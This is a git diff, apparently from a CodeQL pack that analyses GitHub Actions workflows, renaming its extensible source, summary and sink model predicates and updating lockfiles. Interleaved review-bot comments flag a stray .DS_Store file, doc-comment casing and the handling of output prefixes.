.../composite-actions/primer_react.model.yml | 2 +- .../project-chip_connectedhomeip.model.yml | 2 +- .../projectnessie_nessie.model.yml | 2 +- .../composite-actions/psf_black.model.yml | 2 +- .../pyca_cryptography.model.yml | 2 +- .../pyg-team_pytorch_geometric.model.yml | 2 +- .../python-poetry_poetry.model.yml | 2 +- .../composite-actions/python_mypy.model.yml | 2 +- .../quarto-dev_quarto-cli.model.yml | 2 +- .../composite-actions/quay_clair.model.yml | 2 +- .../quickwit-oss_quickwit.model.yml | 2 +- .../composite-actions/r-lib_actions.model.yml | 2 +- .../randombit_botan.model.yml | 2 +- .../raspberrypi_documentation.model.yml | 2 +- .../ray-project_kuberay.model.yml | 2 +- .../readthedocs_actions.model.yml | 2 +- .../reflex-dev_reflex.model.yml | 2 +- .../renovatebot_renovate.model.yml | 2 +- .../rethinkdb_rethinkdb.model.yml | 2 +- .../composite-actions/risc0_risc0.model.yml | 2 +- .../rocketchat_rocket.chat.model.yml | 2 +- .../composite-actions/rook_rook.model.yml | 2 +- .../composite-actions/roots_trellis.model.yml | 2 +- .../composite-actions/ruby_debug.model.yml | 2 +- .../composite-actions/ruby_ruby.model.yml | 2 +- .../composite-actions/rusefi_rusefi.model.yml | 2 +- .../saltstack_salt.model.yml | 2 +- .../composite-actions/saltstack_salt.yml | 2 +- .../sap_sapmachine.model.yml | 2 +- .../scala-native_scala-native.model.yml | 2 +- .../composite-actions/scitools_iris.model.yml | 2 +- .../scylladb_scylla-operator.model.yml | 2 +- .../shader-slang_slang.model.yml | 2 +- .../shaka-project_shaka-player.model.yml | 2 +- ...ode_react-webpack-rails-tutorial.model.yml | 2 +- .../simple-icons_simple-icons.model.yml | 2 +- .../slint-ui_slint.model.yml | 2 +- .../solidusio_solidus.model.yml | 2 +- .../composite-actions/solo-io_gloo.model.yml | 2 +- .../composite-actions/sonarr_sonarr.model.yml | 2 +- .../sonic-pi-net_sonic-pi.model.yml | 2 +- .../spacedriveapp_spacedrive.model.yml | 2 +- .../spockframework_spock.model.yml | 2 +- .../spring-io_initializr.model.yml 
| 2 +- .../spring-io_start.spring.io.model.yml | 2 +- .../spring-projects_spring-boot.model.yml | 2 +- ...spring-projects_spring-framework.model.yml | 2 +- .../spring-projects_spring-graphql.model.yml | 2 +- .../square_workflow-kotlin.model.yml | 2 +- .../stefanprodan_podinfo.model.yml | 2 +- .../composite-actions/stellar_go.model.yml | 2 +- .../streetsidesoftware_cspell.model.yml | 4 +- .../subquery_subql.model.yml | 2 +- .../swagger-api_swagger-codegen.model.yml | 2 +- .../swagger-api_swagger-parser.model.yml | 2 +- .../tarantool_tarantool.model.yml | 2 +- .../telepresenceio_telepresence.model.yml | 2 +- .../tensorflow_datasets.model.yml | 2 +- .../texstudio-org_texstudio.model.yml | 2 +- .../toeverything_affine.model.yml | 2 +- .../treeverse_lakefs.model.yml | 2 +- .../trezor_trezor-firmware.model.yml | 2 +- .../tribler_tribler.model.yml | 2 +- .../trunk-io_trunk-action.model.yml | 2 +- .../composite-actions/unidata_metpy.model.yml | 2 +- .../unstructured-io_unstructured.model.yml | 2 +- .../composite-actions/vercel_turbo.model.yml | 2 +- .../vesoft-inc_nebula.model.yml | 2 +- .../composite-actions/vkcom_vkui.model.yml | 2 +- .../vuetifyjs_vuetify.model.yml | 2 +- .../wagoodman_dive.model.yml | 2 +- ...lletconnect_walletconnectswiftv2.model.yml | 2 +- .../composite-actions/wazuh_wazuh.model.yml | 2 +- .../web-infra-dev_rspack.model.yml | 2 +- .../webassembly_wabt.model.yml | 2 +- .../composite-actions/wntrblm_nox.model.yml | 2 +- .../composite-actions/xrplf_rippled.model.yml | 2 +- .../composite-actions/zcash_zcash.model.yml | 2 +- .../zenml-io_zenml.model.yml | 2 +- .../composite-actions/zeroc-ice_ice.model.yml | 2 +- .../0xpolygon_polygon-edge.model.yml | 2 +- .../reusable-workflows/8vim_8vim.model.yml | 2 +- .../actions_reusable-workflows.model.yml | 2 +- .../reusable-workflows/adap_flower.model.yml | 2 +- .../aio-libs_multidict.model.yml | 2 +- .../aio-libs_yarl.model.yml | 2 +- .../airbytehq_airbyte.model.yml | 2 +- .../alphagov_collections.model.yml | 2 +- 
.../alphagov_frontend.model.yml | 2 +- .../alphagov_publishing-api.model.yml | 2 +- .../reusable-workflows/apache_druid.model.yml | 2 +- .../reusable-workflows/apache_flink.model.yml | 2 +- .../reusable-workflows/apache_spark.model.yml | 2 +- .../argilla-io_argilla.model.yml | 2 +- .../argoproj_argo-cd.model.yml | 2 +- .../argoproj_argo-rollouts.model.yml | 2 +- .../aws-amplify_amplify-ui.model.yml | 2 +- .../reusable-workflows/azure_apiops.model.yml | 2 +- .../azure_mlops-templates.model.yml | 2 +- .../bbq-beets_avocaddo-cmw.model.yml | 2 +- .../bbq-beets_mobile-ci-cd.model.yml | 2 +- .../bbq-beets_yujincat-action.model.yml | 2 +- .../bdunderscore_modular-avatar.model.yml | 2 +- .../benc-uk_workflow-dispatch.model.yml | 2 +- .../bridgecrewio_checkov.model.yml | 2 +- .../bugsnag_bugsnag-ruby.model.yml | 2 +- ...ecodealliance_wasm-micro-runtime.model.yml | 2 +- .../celo-org_celo-blockchain.model.yml | 2 +- .../cemu-project_cemu.model.yml | 2 +- .../cesiumgs_cesium-unreal.model.yml | 2 +- .../reusable-workflows/cgal_cgal.model.yml | 2 +- .../checkstyle_checkstyle.model.yml | 2 +- .../chia-network_actions.model.yml | 2 +- .../chipsalliance_chisel.model.yml | 2 +- .../clickhouse_clickhouse.model.yml | 2 +- .../cloudfoundry_cli.model.yml | 2 +- ...thub-action-matrix-outputs-write.model.yml | 2 +- .../cocotb_cocotb.model.yml | 2 +- .../codeigniter4_codeigniter4.model.yml | 2 +- .../com-lihaoyi_mill.model.yml | 2 +- .../cosmos_ibc-go.model.yml | 2 +- .../crowdsecurity_crowdsec.model.yml | 2 +- .../cryptomator_cryptomator.model.yml | 2 +- .../daeuniverse_dae.model.yml | 2 +- .../dafny-lang_dafny.model.yml | 2 +- .../dagger_dagger.model.yml | 2 +- .../dash-industry-forum_dash.js.model.yml | 2 +- .../datadog_dd-trace-go.model.yml | 2 +- .../datadog_dd-trace-py.model.yml | 2 +- .../datafuselabs_databend.model.yml | 2 +- .../dbt-labs_dbt-bigquery.model.yml | 2 +- .../dbt-labs_dbt-core.model.yml | 2 +- .../dbt-labs_dbt-snowflake.model.yml | 2 +- .../decidim_decidim.model.yml | 
2 +- .../defectdojo_django-defectdojo.model.yml | 2 +- ...dependencytrack_dependency-track.model.yml | 2 +- .../devexpress_testcafe.model.yml | 2 +- .../dfhack_dfhack.model.yml | 2 +- .../docker_build-push-action.model.yml | 2 +- .../dragonwell-project_dragonwell11.model.yml | 2 +- .../earthly_earthly.model.yml | 2 +- .../eclipse-vertx_vert.x.model.yml | 2 +- .../eclipse-vertx_vertx-sql-client.model.yml | 2 +- .../elastic_elasticsearch-net.model.yml | 2 +- .../element-hq_element-desktop.model.yml | 4 +- .../envoyproxy_envoy.model.yml | 2 +- .../etcd-io_bbolt.model.yml | 2 +- .../reusable-workflows/etcd-io_etcd.model.yml | 2 +- .../eventstore_eventstore.model.yml | 2 +- .../expensify_app.model.yml | 2 +- ...xternal-secrets_external-secrets.model.yml | 2 +- .../facebook_create-react-app.model.yml | 2 +- .../facebookresearch_xformers.model.yml | 2 +- .../falcosecurity_falco.model.yml | 2 +- .../fastify_fastify.model.yml | 2 +- .../ferretdb_ferretdb.model.yml | 2 +- .../filecoin-project_venus.model.yml | 2 +- .../firebase_firebase-unity-sdk.model.yml | 2 +- .../flarum_framework.model.yml | 2 +- .../fluent_fluent-bit.model.yml | 2 +- .../flux-iac_tofu-controller.model.yml | 2 +- .../flyteorg_flyte.model.yml | 2 +- .../foundatiofx_foundatio.model.yml | 2 +- .../freecad_freecad.model.yml | 2 +- .../getpelican_pelican.model.yml | 2 +- .../getporter_porter.model.yml | 2 +- .../getsentry_sentry-dart.model.yml | 2 +- .../getsentry_sentry-unity.model.yml | 2 +- .../gitpod-io_gitpod.model.yml | 2 +- .../gittools_gitversion.model.yml | 2 +- ...ooglecloudplatform_magic-modules.model.yml | 2 +- ...loudplatform_nodejs-docs-samples.model.yml | 2 +- .../gravitational_teleport.model.yml | 2 +- .../gravitl_netmaker.model.yml | 2 +- .../reusable-workflows/h2oai_wave.model.yml | 2 +- .../hadashia_vcontainer.model.yml | 2 +- .../hashgraph_hedera-services.model.yml | 2 +- .../hashicorp_boundary.model.yml | 2 +- .../hashicorp_consul.model.yml | 2 +- .../hashicorp_terraform-cdk.model.yml | 2 
+- ...hashicorp_terraform-provider-tfe.model.yml | 2 +- .../hashicorp_terraform.model.yml | 2 +- .../hashicorp_vault.model.yml | 4 +- .../reusable-workflows/heroku_cli.model.yml | 2 +- .../hitobito_hitobito.model.yml | 4 +- .../home-assistant_operating-system.model.yml | 2 +- .../homuler_mediapipeunityplugin.model.yml | 2 +- .../huggingface_doc-builder.model.yml | 2 +- .../huggingface_transformers.model.yml | 2 +- .../hyperion-project_hyperion.ng.model.yml | 2 +- .../reusable-workflows/ibm_sarama.model.yml | 2 +- ...nloader_icloud_photos_downloader.model.yml | 2 +- .../immich-app_immich.model.yml | 2 +- .../reusable-workflows/inria_spoon.model.yml | 2 +- ...el-device-plugins-for-kubernetes.model.yml | 2 +- .../inverse-inc_packetfence.model.yml | 2 +- .../reusable-workflows/ispc_ispc.model.yml | 2 +- ..._intellij-platform-gradle-plugin.model.yml | 2 +- .../jupyter_docker-stacks.model.yml | 2 +- .../kairos-io_kairos.model.yml | 2 +- .../kanidm_kanidm.model.yml | 2 +- .../kata-containers_kata-containers.model.yml | 2 +- .../reusable-workflows/kiali_kiali.model.yml | 2 +- .../kotest_kotest.model.yml | 2 +- .../kubernetes_ingress-nginx.model.yml | 2 +- .../kubescape_kubescape.model.yml | 2 +- .../kubeshop_botkube.model.yml | 4 +- .../reusable-workflows/kumahq_kuma.model.yml | 2 +- .../labring_sealos.model.yml | 2 +- .../laion-ai_open-assistant.model.yml | 2 +- .../learningequality_kolibri.model.yml | 2 +- .../lensesio_stream-reactor.model.yml | 2 +- .../leptos-rs_leptos.model.yml | 2 +- .../lightning-ai_pytorch-lightning.model.yml | 2 +- .../liquibase_liquibase.model.yml | 2 +- .../litestar-org_litestar.model.yml | 2 +- .../reusable-workflows/llvm_circt.model.yml | 2 +- .../lnbits_lnbits.model.yml | 2 +- .../lutris_lutris.model.yml | 2 +- .../reusable-workflows/mailu_mailu.model.yml | 2 +- .../mamba-org_mamba.model.yml | 2 +- ...anticoresoftware_manticoresearch.model.yml | 2 +- .../marcelotduarte_cx_freeze.model.yml | 2 +- ...xaml_materialdesigninxamltoolkit.model.yml | 
2 +- .../matter-labs_zksync-era.model.yml | 2 +- .../mattermost_desktop.model.yml | 2 +- .../mattermost_mattermost.model.yml | 2 +- .../mealie-recipes_mealie.model.yml | 2 +- .../meshery_meshery.model.yml | 2 +- .../meshtastic_firmware.model.yml | 2 +- .../microcks_microcks.model.yml | 2 +- ...crosoft_applicationinsights-java.model.yml | 2 +- .../microsoft_chat-copilot.model.yml | 2 +- .../microsoft_msquic.model.yml | 2 +- .../microsoft_oryx.model.yml | 2 +- .../microsoft_pr-metrics.model.yml | 2 +- ...oft_react-native-windows-samples.model.yml | 2 +- .../microsoft_vscode-cpptools.model.yml | 2 +- .../moby_buildkit.model.yml | 2 +- .../reusable-workflows/moby_moby.model.yml | 2 +- .../mosaicml_composer.model.yml | 2 +- .../msys2_setup-msys2.model.yml | 2 +- .../mudler_localai.model.yml | 2 +- .../mustardchef_wsabuilds.model.yml | 2 +- .../reusable-workflows/n8n-io_n8n.model.yml | 2 +- .../napari_napari.model.yml | 2 +- .../reusable-workflows/nasa_fprime.model.yml | 2 +- .../nautobot_nautobot.model.yml | 2 +- .../reusable-workflows/nektos_act.model.yml | 2 +- .../neondatabase_neon.model.yml | 2 +- .../neovim_neovim.model.yml | 2 +- .../nethermindeth_nethermind.model.yml | 2 +- .../newrelic_newrelic-dotnet-agent.model.yml | 2 +- .../newrelic_newrelic-java-agent.model.yml | 2 +- .../newrelic_node-newrelic.model.yml | 2 +- .../nexus-mods_nexusmods.app.model.yml | 2 +- .../nginxinc_kubernetes-ingress.model.yml | 2 +- .../nocodb_nocodb.model.yml | 2 +- .../reusable-workflows/novuhq_novu.model.yml | 2 +- .../npm_abbrev-js.model.yml | 2 +- .../reusable-workflows/npm_cli.model.yml | 2 +- .../npm_fs-minipass.model.yml | 2 +- .../npm_hosted-git-info.model.yml | 2 +- .../reusable-workflows/npm_ini.model.yml | 2 +- ...pm_json-parse-even-better-errors.model.yml | 2 +- .../npm_minify-registry-metadata.model.yml | 2 +- .../npm_mute-stream.model.yml | 2 +- .../npm_node-semver.model.yml | 2 +- .../npm_node-which.model.yml | 2 +- .../reusable-workflows/npm_nopt.model.yml | 2 +- 
.../npm_normalize-package-data.model.yml | 2 +- .../npm_write-file-atomic.model.yml | 2 +- .../onflow_cadence.model.yml | 2 +- .../open-goal_jak-project.model.yml | 2 +- ...pen-telemetry_opentelemetry-demo.model.yml | 2 +- ...try_opentelemetry-dotnet-contrib.model.yml | 2 +- ...n-telemetry_opentelemetry-dotnet.model.yml | 2 +- ...entelemetry-java-instrumentation.model.yml | 2 +- ...lemetry_opentelemetry-js-contrib.model.yml | 2 +- ...telemetry_opentelemetry-operator.model.yml | 2 +- .../openbao_openbao.model.yml | 2 +- .../openhab_openhab-docs.model.yml | 2 +- .../openmined_pysyft.model.yml | 2 +- .../opentofu_opentofu.model.yml | 2 +- .../openttd_openttd.model.yml | 2 +- .../openvinotoolkit_openvino.model.yml | 2 +- .../reusable-workflows/openxla_iree.model.yml | 2 +- .../reusable-workflows/openzfs_zfs.model.yml | 2 +- ...ator-framework_java-operator-sdk.model.yml | 2 +- .../orange-opensource_hurl.model.yml | 2 +- ...aolosalvatori_servicebusexplorer.model.yml | 2 +- .../parcel-bundler_parcel.model.yml | 2 +- .../pardeike_harmony.model.yml | 2 +- .../reusable-workflows/pcsx2_pcsx2.model.yml | 2 +- .../pennylaneai_pennylane.model.yml | 2 +- ...necone-io_pinecone-python-client.model.yml | 2 +- .../pixie-io_pixie.model.yml | 2 +- .../plantuml_plantuml.model.yml | 2 +- .../powerdns_pdns.model.yml | 2 +- .../preactjs_preact.model.yml | 2 +- .../prismlauncher_prismlauncher.model.yml | 2 +- .../product-os_flowzone.model.yml | 2 +- .../project-oak_oak.model.yml | 2 +- .../reusable-workflows/prql_prql.model.yml | 2 +- .../pulumi_pulumi.model.yml | 2 +- .../puppeteer_puppeteer.model.yml | 2 +- .../puppetlabs_puppetlabs-puppetdb.model.yml | 2 +- .../reusable-workflows/pyo3_maturin.model.yml | 2 +- .../reusable-workflows/pyo3_pyo3.model.yml | 2 +- .../python_cpython.model.yml | 2 +- .../pytorch_botorch.model.yml | 2 +- .../reusable-workflows/pytorch_xla.model.yml | 2 +- .../quarto-dev_quarto-cli.model.yml | 2 +- .../rancher_dashboard.model.yml | 2 +- 
.../rasterio_rasterio.model.yml | 2 +- .../redisearch_redisearch.model.yml | 2 +- .../remix-run_remix.model.yml | 2 +- .../rmcrackan_libation.model.yml | 2 +- .../rocketchat_rocket.chat.model.yml | 2 +- .../ruby_ruby.wasm.model.yml | 2 +- .../rustdesk_rustdesk.model.yml | 2 +- .../saadeghi_daisyui.model.yml | 2 +- .../sagemath_sage.model.yml | 2 +- .../schemastore_schemastore.model.yml | 2 +- .../scikit-learn_scikit-learn.model.yml | 2 +- .../seleniumhq_selenium.model.yml | 2 +- .../shaka-project_shaka-packager.model.yml | 2 +- .../shaka-project_shaka-player.model.yml | 2 +- .../shimataro_ssh-key-action.model.yml | 2 +- .../softfever_orcaslicer.model.yml | 2 +- ...-mansion_react-native-reanimated.model.yml | 2 +- .../solana-labs_solana.model.yml | 2 +- .../sonarr_sonarr.model.yml | 2 +- .../speedb-io_speedb.model.yml | 2 +- ...ring-cloud_spring-cloud-dataflow.model.yml | 2 +- .../sqlfluff_sqlfluff.model.yml | 2 +- .../stdlib-js_stdlib.model.yml | 2 +- .../stereokit_stereokit.model.yml | 2 +- .../streetsidesoftware_cspell.model.yml | 4 +- .../supabase_auth.model.yml | 2 +- .../reusable-workflows/supabase_cli.model.yml | 2 +- .../tencent_hippy.model.yml | 4 +- .../tgstation_tgstation.model.yml | 2 +- .../thesofproject_sof.model.yml | 2 +- .../tiann_kernelsu.model.yml | 2 +- .../tiledb-inc_tiledb.model.yml | 2 +- .../toeverything_affine.model.yml | 2 +- .../tracel-ai_burn.model.yml | 2 +- .../tribler_tribler.model.yml | 2 +- .../ubisoft_sharpmake.model.yml | 2 +- .../unity-technologies_ml-agents.model.yml | 2 +- .../reusable-workflows/urbit_urbit.model.yml | 2 +- .../uyuni-project_uyuni.model.yml | 2 +- .../vert-x3_vertx-hazelcast.model.yml | 2 +- .../reusable-workflows/vkcom_vkui.model.yml | 2 +- .../walletconnect_web3modal.model.yml | 2 +- .../warzone2100_warzone2100.model.yml | 2 +- .../wasmedge_wasmedge.model.yml | 2 +- .../web-infra-dev_rspack.model.yml | 2 +- .../reusable-workflows/werf_werf.model.yml | 2 +- .../widdix_aws-cf-templates.model.yml | 2 +- 
.../wildfly_wildfly.model.yml | 2 +- .../yt-dlp_yt-dlp.model.yml | 2 +- .../zenml-io_zenml.model.yml | 2 +- .../zephyrproject-rtos_zephyr.model.yml | 2 +- .../zitadel_zitadel.model.yml | 4 +- ql/lib/ext/getsentry_action-release.model.yml | 2 +- ql/lib/ext/github_codeql-action.model.yml | 2 +- .../ext/go-semantic-release_action.model.yml | 2 +- .../golangci_golangci-lint-action.model.yml | 2 +- .../ext/gonuit_heroku-docker-deploy.model.yml | 2 +- .../goreleaser_goreleaser-action.model.yml | 2 +- ...te-or-update-pull-request-action.model.yml | 2 +- .../ext/gradle_gradle-build-action.model.yml | 2 +- ql/lib/ext/haya14busa_action-cond.model.yml | 2 +- ql/lib/ext/hexlet_project-action.model.yml | 2 +- ql/lib/ext/ilammy_msvc-dev-cmd.model.yml | 2 +- ql/lib/ext/ilammy_setup-nasm.model.yml | 2 +- ql/lib/ext/imjohnbo_issue-bot.model.yml | 2 +- ql/lib/ext/iterative_setup-cml.model.yml | 2 +- ql/lib/ext/iterative_setup-dvc.model.yml | 2 +- ...sives_github-pages-deploy-action.model.yml | 2 +- .../ext/jitterbit_get-changed-files.model.yml | 2 +- .../ext/johnnymorganz_stylua-action.model.yml | 2 +- ql/lib/ext/jsdaniell_create-json.model.yml | 2 +- .../ext/jurplel_install-qt-action.model.yml | 2 +- ql/lib/ext/jwalton_gh-ecr-push.model.yml | 4 +- ...han_pull-request-comment-trigger.model.yml | 2 +- ...leci-artifacts-redirector-action.model.yml | 2 +- ql/lib/ext/leafo_gh-actions-lua.model.yml | 2 +- .../ext/leafo_gh-actions-luarocks.model.yml | 2 +- .../lucasbento_auto-close-issues.model.yml | 2 +- ..._actions-find-and-replace-string.model.yml | 2 +- ql/lib/ext/magefile_mage-action.model.yml | 2 +- ql/lib/ext/maierj_fastlane-action.model.yml | 2 +- .../manusa_actions-setup-minikube.model.yml | 2 +- ql/lib/ext/marocchino_on_artifact.model.yml | 2 +- ql/lib/ext/mattdavis0351_actions.model.yml | 4 +- .../ext/meteorengineer_setup-meteor.model.yml | 2 +- ...tro-digital_setup-tools-for-waas.model.yml | 2 +- ql/lib/ext/microsoft_setup-msbuild.model.yml | 2 +- 
...mishakav_pytest-coverage-comment.model.yml | 2 +- ...hers-excellent_docker-build-push.model.yml | 2 +- ql/lib/ext/msys2_setup-msys2.model.yml | 2 +- ql/lib/ext/mxschmitt_action-tmate.model.yml | 2 +- ql/lib/ext/mymindstorm_setup-emsdk.model.yml | 4 +- .../ext/nanasess_setup-chromedriver.model.yml | 2 +- ql/lib/ext/nanasess_setup-php.model.yml | 2 +- ql/lib/ext/nick-fields_retry.model.yml | 2 +- ql/lib/ext/octokit_graphql-action.model.yml | 2 +- ql/lib/ext/octokit_request-action.model.yml | 2 +- ql/lib/ext/olafurpg_setup-scala.model.yml | 2 +- .../paambaati_codeclimate-action.model.yml | 2 +- .../peter-evans_create-pull-request.model.yml | 2 +- ...-murray_issue-body-parser-action.model.yml | 2 +- .../ext/plasmicapp_plasmic-action.model.yml | 2 +- .../preactjs_compressed-size-action.model.yml | 2 +- ql/lib/ext/py-actions_flake8.model.yml | 2 +- ...py-actions_py-dependency-install.model.yml | 2 +- ql/lib/ext/pyo3_maturin-action.model.yml | 2 +- ...vecircus_android-emulator-runner.model.yml | 2 +- ...bers-in-action_download-artifact.model.yml | 2 +- ql/lib/ext/reggionick_s3-deploy.model.yml | 2 +- .../ext/renovatebot_github-action.model.yml | 2 +- .../ext/roots_issue-closer-action.model.yml | 2 +- ql/lib/ext/ros-tooling_setup-ros.model.yml | 2 +- ql/lib/ext/ruby_setup-ruby.model.yml | 4 +- ...ction-detect-and-tag-new-version.model.yml | 4 +- ql/lib/ext/sergeysova_jq-action.model.yml | 2 +- ...shallwefootball_upload-s3-action.model.yml | 2 +- .../shogo82148_actions-setup-perl.model.yml | 2 +- ...skitionek_notify-microsoft-teams.model.yml | 2 +- ql/lib/ext/snow-actions_eclint.model.yml | 2 +- .../ext/stackhawk_hawkscan-action.model.yml | 2 +- .../ext/step-security_harden-runner.model.yml | 2 +- .../suisei-cn_actions-download-file.model.yml | 2 +- ql/lib/ext/tibdex_backport.model.yml | 2 +- ql/lib/ext/timheuer_base64-to-file.model.yml | 2 +- ql/lib/ext/tj-actions_branch-names.model.yml | 2 +- .../ext/trilom_file-changes-action.model.yml | 2 +- 
...ss_conventional-changelog-action.model.yml | 2 +-
 .../tryghost_action-deploy-theme.model.yml | 2 +-
 ql/lib/ext/tzkhan_pr-update-action.model.yml | 2 +-
 ql/lib/ext/veracode_veracode-sca.model.yml | 2 +-
 .../ext/wearerequired_lint-action.model.yml | 2 +-
 ql/lib/ext/webfactory_ssh-agent.model.yml | 2 +-
 .../xt0rted_slash-command-action.model.yml | 2 +-
 ql/lib/ext/zaproxy_action-baseline.model.yml | 2 +-
 ql/lib/ext/zaproxy_action-full-scan.model.yml | 2 +-
 ql/lib/qlpack.yml | 7 +-
 ql/lib/yaml.dbscheme | 80 -------------------
 ql/lib/yaml.dbscheme.stats | 4 -
 ql/src/codeql-pack.lock.yml | 6 ++
 ql/src/qlpack.yml | 3 +-
 ql/test/codeql-pack.lock.yml | 6 ++
 ql/test/library-tests/test.ql | 4 +-
 ql/test/qlpack.yml | 6 +-
 754 files changed, 808 insertions(+), 874 deletions(-)
 create mode 100644 .!79690!.DS_Store
 delete mode 100644 ql/lib/yaml.dbscheme
 delete mode 100644 ql/lib/yaml.dbscheme.stats
diff --git a/.!79690!.DS_Store b/.!79690!.DS_Store
new file mode 100644
index 000000000000..e69de29bb2d1
diff --git a/ql/lib/codeql-pack.lock.yml b/ql/lib/codeql-pack.lock.yml
index 4b8239b7f6ca..c50889c18858 100644
--- a/ql/lib/codeql-pack.lock.yml
+++ b/ql/lib/codeql-pack.lock.yml
@@ -1,16 +1,24 @@
 ---
 lockVersion: 1.0.0
 dependencies:
- codeql/controlflow:
- version: 1.0.0
 codeql/dataflow:
 version: 1.0.0
+ codeql/javascript-all:
+ version: 1.0.0
+ codeql/mad:
+ version: 1.0.0
+ codeql/regex:
+ version: 1.0.0
 codeql/ssa:
 version: 1.0.0
+ codeql/tutorial:
+ version: 1.0.0
 codeql/typetracking:
 version: 1.0.0
 codeql/util:
 version: 1.0.0
+ codeql/xml:
+ version: 1.0.0
 codeql/yaml:
 version: 1.0.0
 compiled: false
diff --git a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll
index c46a3ee64a1f..d0b84f918d59 100644
--- a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll
+++ b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll
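Review bot: The commit checks in `.!79690!.DS_Store` at the repository root (`create mode 100644 .!79690!.DS_Store`, `new file mode 100644`, zero lines in the diffstat), which looks like a stray macOS Finder temp artifact rather than anything the extractor migration needs. Its name is not the plain `.DS_Store` that an ignore rule typically lists, which is presumably how it got past the ignore file; drop it from the commit and widen the rule to `*.DS_Store` or add `.!*!.DS_Store` so the variant cannot recur. The `codeql-pack.lock.yml` hunk on this line is regenerated lockfile content; the only thing worth noting there is that `codeql/controlflow` is dropped while `codeql/javascript-all` and its transitive packs are pulled in, which is consistent with the subject line.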
@@ -55,8 +55,8 @@ predicate externallyTriggerableEventsDataModel(string event) {
 * - output arg: To node (prefixed with either `env.` or `output.`)
 * - provenance: verification of the model
 */
-predicate sourceModel(string action, string version, string output, string kind, string provenance) {
- Extensions::sourceModel(action, version, output, kind, provenance)
+predicate actionsSourceModel(string action, string version, string output, string kind, string provenance) {
+ Extensions::actionsSourceModel(action, version, output, kind, provenance)
 }
 /**
@@ -69,10 +69,10 @@ predicate sourceModel(string action, string version, string output, string kind,
 * - kind: Either 'Taint' or 'Value'
 * - provenance: verification of the model
 */
-predicate summaryModel(
+predicate actionsSummaryModel(
 string action, string version, string input, string output, string kind, string provenance
 ) {
- Extensions::summaryModel(action, version, input, output, kind, provenance)
+ Extensions::actionsSummaryModel(action, version, input, output, kind, provenance)
 }
 /**
@@ -84,13 +84,13 @@ predicate summaryModel(
 * - kind: sink kind
 * - provenance: verification of the model
 */
-predicate sinkModel(string action, string version, string input, string kind, string provenance) {
- Extensions::sinkModel(action, version, input, kind, provenance)
+predicate actionsSinkModel(string action, string version, string input, string kind, string provenance) {
+ Extensions::actionsSinkModel(action, version, input, kind, provenance)
 }
 predicate externallyDefinedSource(DataFlow::Node source, string sourceType, string fieldName) {
 exists(Uses uses, string action, string version, string kind |
- sourceModel(action, version, fieldName, kind, _) and
+ actionsSourceModel(action, version, fieldName, kind, _) and
 uses.getCallee() = action.toLowerCase() and
 (
 if version.trim() = "*"
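Review bot: The QLDoc kept above the renamed `actionsSummaryModel` still says `kind: Either 'Taint' or 'Value'`, while the library matches the lowercase literal `"taint"` (see the `actionsSummaryModel(action, version, input, output, "taint", _)` call in `externallyDefinedStoreStep`) and every summary row in this commit uses `"taint"`; the comment should read `* - kind: 'taint'` (plus `'value'` only if that kind is actually consumed somewhere) so model authors do not pick a casing that never matches. Separately, the one-line signatures of `actionsSourceModel` and `actionsSinkModel` grew past 100 columns with the rename; wrapping them the way `actionsSummaryModel` already is — `predicate actionsSourceModel(` / `  string action, string version, string output, string kind, string provenance` / `) {` — keeps the file consistent and `codeql query format` clean. The reason for the `actions` prefix is not recorded; if it is to avoid clashing with the extensible `sourceModel`/`sinkModel`/`summaryModel` predicates of the `codeql/javascript-all` pack this commit adds to the lock file (my inference), a one-line QLDoc note saying so would spare the next maintainer the archaeology.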
@@ -113,7 +113,7 @@ predicate externallyDefinedStoreStep(
 DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c
 ) {
 exists(Uses uses, string action, string version, string input, string output |
- summaryModel(action, version, input, output, "taint", _) and
+ actionsSummaryModel(action, version, input, output, "taint", _) and
 c = any(DataFlow::FieldContent ct | ct.getName() = output.replaceAll("output.", "")) and
 uses.getCallee() = action.toLowerCase() and
 (
@@ -135,7 +135,7 @@ predicate externallyDefinedStoreStep(
 predicate externallyDefinedSink(DataFlow::Node sink, string kind) {
 exists(Uses uses, string action, string version, string input |
- sinkModel(action, version, input, kind, _) and
+ actionsSinkModel(action, version, input, kind, _) and
 uses.getCallee() = action.toLowerCase() and
 (
 if input.trim().matches("env.%")
diff --git a/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll b/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll
index 6c64b72e6b4c..05f71cfc0be6 100644
--- a/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll
+++ b/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll
@@ -5,21 +5,21 @@
 /**
 * Holds if a source model exists for the given parameters.
 */
-extensible predicate sourceModel(
+extensible predicate actionsSourceModel(
 string action, string version, string output, string kind, string provenance
 );
 /**
 * Holds if a summary model exists for the given parameters.
 */
-extensible predicate summaryModel(
+extensible predicate actionsSummaryModel(
 string action, string version, string input, string output, string kind, string provenance
 );
 /**
 * Holds if a sink model exists for the given parameters.
 */
-extensible predicate sinkModel(
+extensible predicate actionsSinkModel(
 string action, string version, string input, string kind, string provenance
 );
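Review bot: The store step selected through `actionsSummaryModel(action, version, input, output, "taint", _)` derives the field name with `output.replaceAll("output.", "")`, which leaves every other prefix intact, yet summary rows in this same commit target `env.BUF_TOKEN`, `env.CACHIX_SIGNING_KEY` and `secret.AWS_ACCESS_KEY_ID`; unless the part of `externallyDefinedStoreStep` outside this hunk dispatches on those prefixes the way `externallyDefinedSink` does with `input.trim().matches("env.%")`, such rows would produce a field literally named `env.…`/`secret.…` and never match a real output. Please confirm, and document the accepted `output` prefixes for summary rows (`output.`, `env.`, and `secret.` if it is intended) in the `actionsSummaryModel` QLDoc, alongside the `env.`/`output.` prefixes already spelled out for the source model. `externallyDefinedStoreStep` starts before this hunk and its body continues past the `(` where the hunk ends, so the dispatch may well live there.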
diff --git a/ql/lib/ext/8398a7_action-slack.model.yml b/ql/lib/ext/8398a7_action-slack.model.yml
index 67455900ec36..b897e8f2c5a4 100644
--- a/ql/lib/ext/8398a7_action-slack.model.yml
+++ b/ql/lib/ext/8398a7_action-slack.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["8398a7/action-slack", "*", "input.custom_payload", "code-injection", "manual"]
\ No newline at end of file
